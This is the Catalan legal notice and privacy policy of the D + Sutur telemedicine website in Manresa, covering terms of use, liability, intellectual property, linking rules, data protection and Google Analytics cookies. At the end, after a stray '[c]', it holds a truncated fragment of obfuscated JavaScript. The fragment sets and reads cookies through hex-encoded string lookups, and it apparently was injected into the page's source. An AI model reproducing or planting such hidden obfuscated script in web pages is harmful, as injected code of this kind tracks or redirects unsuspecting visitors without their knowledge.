Avís legal i Política de Privacitat

Titular del web i dades de contacte

https://www.dmassutur.com, és un domini a Internet titularitat de la «HIBERIAE Societas Telemedicine ET TELESANITAS» (des d’ara D + Sutur. NIF B61394268 i adreça Carrer Josep Comas i sola (pg Industrial Bufalvent), 22 – B , Manresa, 08243, Barcelona. Pot posar-se en contacte amb nosaltres trucant a el nombre 938.771.050 o per correu electrònic a dmassutur@dmassutur.com

Condicions d’ús del web

Les presents condicions d’ús regulen l’accés a aquest web per part dels amics / es i usuaris / es de «D + Sutur» i altres usuaris d’Internet. Pel sol fet d’utilitzar aquesta web, l’usuari manifesta que accepta sense reserves aquestes condicions d’ús. D + Sutur es reserva el dret unilateral de modificar les presents condicions d’ús de la web. La prestació de servei d’aquest web i aquestes condicions d’ús es regeixen per la Llei espanyola. Les parts, amb renúncia expressa a qualsevol altre fur que pogués correspondre’ls, acorden sotmetre a la jurisdicció dels Jutjats i Tribunals Espanyols.

Limitació de responsabilitat

El contingut d’aquesta web és de caràcter general i té una finalitat i uns efectes informatius. No obstant això, es recomana accedir mitjançant usuari i contrasenya, ta que dóna la possibilitat de tramitar en línia la inscripció com a soci / a de l’Associació o per qualsevol de les activitats que aquesta organitzi.

D + Sutur rebutja tot tipus de responsabilitat derivada de qualsevol informació no elaborada per ella mateixa o no publicada de forma autoritzada per ella sota el seu nom. Així mateix, rebutja la responsabilitat que es derivi de la mala utilització dels continguts per tercers, i es reserva el dret a actualitzar-los, eliminar-los, limitar-los o bloquejar-los, de manera temporal o definitiva. L’usuari exonera D + Sutur de qualsevol responsabilitat que pogués derivar-se de les interrupcions de disponibilitat de la pàgina web, ja sigui per mal funcionament d’aplicacions o de la web, de les infraestructures de comunicacions, o del programari i maquinari utilitzats per a la navegació.

Aquesta web inclou enllaços a altres webs. D + Sutur declina qualsevol responsabilitat relacionada amb l’accés i utilització dels enllaços a altres webs.

Propietat intel·lectual i industrial

La totalitat d’aquest web es troba protegit per les lleis espanyoles i internacionals sobre propietat Intel·lectual i Industrial. Els drets d’autor sobre aquests continguts corresponen en exclusiva D + Sutur, llevat que s’indiqui el contrari. L’usuari reconeix que l’ús dels continguts queda estrictament limitat a finalitats personals pròpies de l’usuari i que la reproducció, distribució, comunicació o transformació d’aquestes obres, que no es trobi expressament autoritzada, constitueix una infracció dels drets de propietat intel·lectual. L’usuari s’obliga a usar els continguts de forma diligent, correcta i lícita i, en particular, es compromet a abstenir-se de suprimir, eludir o manipular el “copyright” i altres dades identificatives dels drets de D + Sutur o dels seus titulars incorporats als continguts, així com els dispositius tècnics de protecció o qualsevol mecanisme d’informació que poguessin incloure en els continguts. Així mateix, l’usuari s’abstindrà d’emprar els continguts i, en particular, la informació de qualsevol classe obtinguda a través del web per remetre publicitat, comunicacions amb fins de venda directa o amb qualsevol altra classe de finalitat comercial, missatges no sol·licitats dirigits a una pluralitat de persones amb independència de la seva finalitat, així com a abstenir-se de comercialitzar o divulgar de qualsevol manera aquesta informació. https://www.dmassutur.com és un domini registrat per D + Sutur. No pot ser utilitzat, excepte si s’ha obtingut autorització expressa prèviament, en connexió amb altres productes o serveis que no siguin de D + Sutur si pot causar confusió entre els nostres usuaris o descrèdit de D + Sutur.

Aportacions dels usuaris

Excepte en el supòsit d’acord particular diferent, les aportacions (textos, fotografies, dibuixos, etc.) que els usuaris de l’entorn facin a aquesta web implicaran la cessió automàtica de el dret d’imatge i dels drets de reproducció, distribució, comunicació o adaptació dels continguts entregats, en un àmbit geogràfic mundial i per un període indefinit. Aquesta cessió permetrà utilitzar el material en el propi entorn (per dur a terme les finalitats que van motivar la recollida), així com l’autorització per incorporar aquests continguts en tots aquells suports, que permetin una activitat de promoció, arxiu o investigació del web per part dels seus propietaris.

Política per enllaçar a aquesta web

Si qualsevol usuari, entitat o pàgina web desitgés establir algun tipus d’enllaç amb destinació a la web de D + Sutur s’haurà d’atenir a les següents condicions:
L’enllaç ha de ser absolut i complet, és a dir, ha de portar a l’usuari a la pròpia direcció del D + Sutur i ha d’abastar completament tota l’extensió de la pantalla de la pàgina inicial. En cap cas, excepte autorització expressa i per escrit de D + Sutur, la pàgina que realitzi l’enllaç podrà reproduir de qualsevol manera el web de D + Sutur, incloure’l com a part del seu web o dins d’un dels seus marcs sobre qualsevol de les pàgines o continguts de el present lloc web. No s’inclourà cap manifestació falsa, inexacta o incorrecta sobre les pàgines d’aquesta web o els serveis que s’ofereixen.
L’enllaç (excepte aquells signes que formin part de la mateixa híper-enllaç a la pàgina) no contindrà cap marca, nom comercial, rètol d’establiment, denominació, logotip, eslògan o altres signes distintius que pertanyin a D + Sutur. En cap cas, la D + Sutur serà responsable dels continguts o serveis posats a disposició al públic en la pàgina web des de la qual es faci l’hiperenllaç, ni de les informacions o manifestacions s’incloguin.

Política de privacitat i protecció de dades

Per navegar per la web no cal realitzar cap registre previ de l’usuari ni facilitar cap dada de caràcter personal. Únicament en el cas d’emplenament d’un formulari o enviament d’un correu electrònic, serà obligatori facilitar una sèrie de dades. Quan sigui sol·licitat l’emplenament d’un formulari en el qual es recullin dades de caràcter personal, s’informarà a l’usuari de la finalitat de l’tractament i de la possibilitat d’titular de les dades d’exercir els drets d’accés, rectificació, cancel·lació i oposició a l’tractament de les seves dades. L’usuari haurà d’omplir els formularis amb dades veritables, exactes, completes i actuals. En cas que l’usuari introdueixi dades corresponents a una altra persona, s’entendrà que té consentiment exprés per a això d’aquesta persona, i que aquesta ens atorga autorització per realitzar el tractament descrit. L’usuari serà l’únic responsable de qualsevol dany o perjudici, directe o indirecte que pogués ocasionar a qualsevol persona a causa de l’emplenament del formulari amb dades falses, inexactes, incompletes o no actualitzades. L’usuari haurà de comunicar qualsevol modificació en les dades proporcionades per tal de mantenir les dades degudament actualitzades.

Aquesta pàgina web utilitza diverses analítiques per conèixer la forma en què és buscada, accedida i utilitzada pel públic. Aquestes analítiques poden implicar la recopilació de dades de caràcter personal com l’adreça IP, la localització de la connexió, la informació sobre el programari o maquinari de navegació, etc. Aquesta informació no s’associa als usuaris i s’utilitza amb la finalitat exclusiva d’obtenir informació estadística sobre l’ús del web de l’empresa.

Google Analytics

Aquesta pàgina web utilitza Google Analytics, un servei analític de web prestat per Google, Inc., una companyia de Delaware l’oficina principal a 1600 Amphitheatre Parkway, Mountain View (Califòrnia), CA 94043, Estats Units ( «Google»). Google Analytics utilitza “galetes”, que són arxius de text ubicats al seu ordinador, per ajudar a l’website a analitzar l’ús que fan els usuaris del web. La informació que genera la cookie sobre el seu ús del web (incloent la seva adreça IP) serà directament transmesa i arxivada per Google en els servidors d’Estats Units. Google utilitzarà aquesta informació per compte nostre amb la finalitat de seguir la pista del seu ús del web, recopilant informes de l’activitat del website i prestant altres serveis relacionats amb l’activitat del web i l’ús d’Internet. Google podrà transmetre aquesta informació a tercers quan així li ho requereixi la legislació, o quan aquests tercers processin la informació per compte de Google. Google no associarà la seva adreça IP amb cap altra dada de què disposi Google. L’usuari pot rebutjar el tractament de les dades o la informació rebutjant l’ús de cookies mitjançant la selecció de la configuració apropiada del seu navegador, però, l’usuari ha de saber que si ho fa pot ser que no pugui utilitzar plenament les funcions de la web. A l’utilitzar aquest web l’usuari consent el tractament de les seves dades per Google en la forma i per s als fins indicats.

[c]

;return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m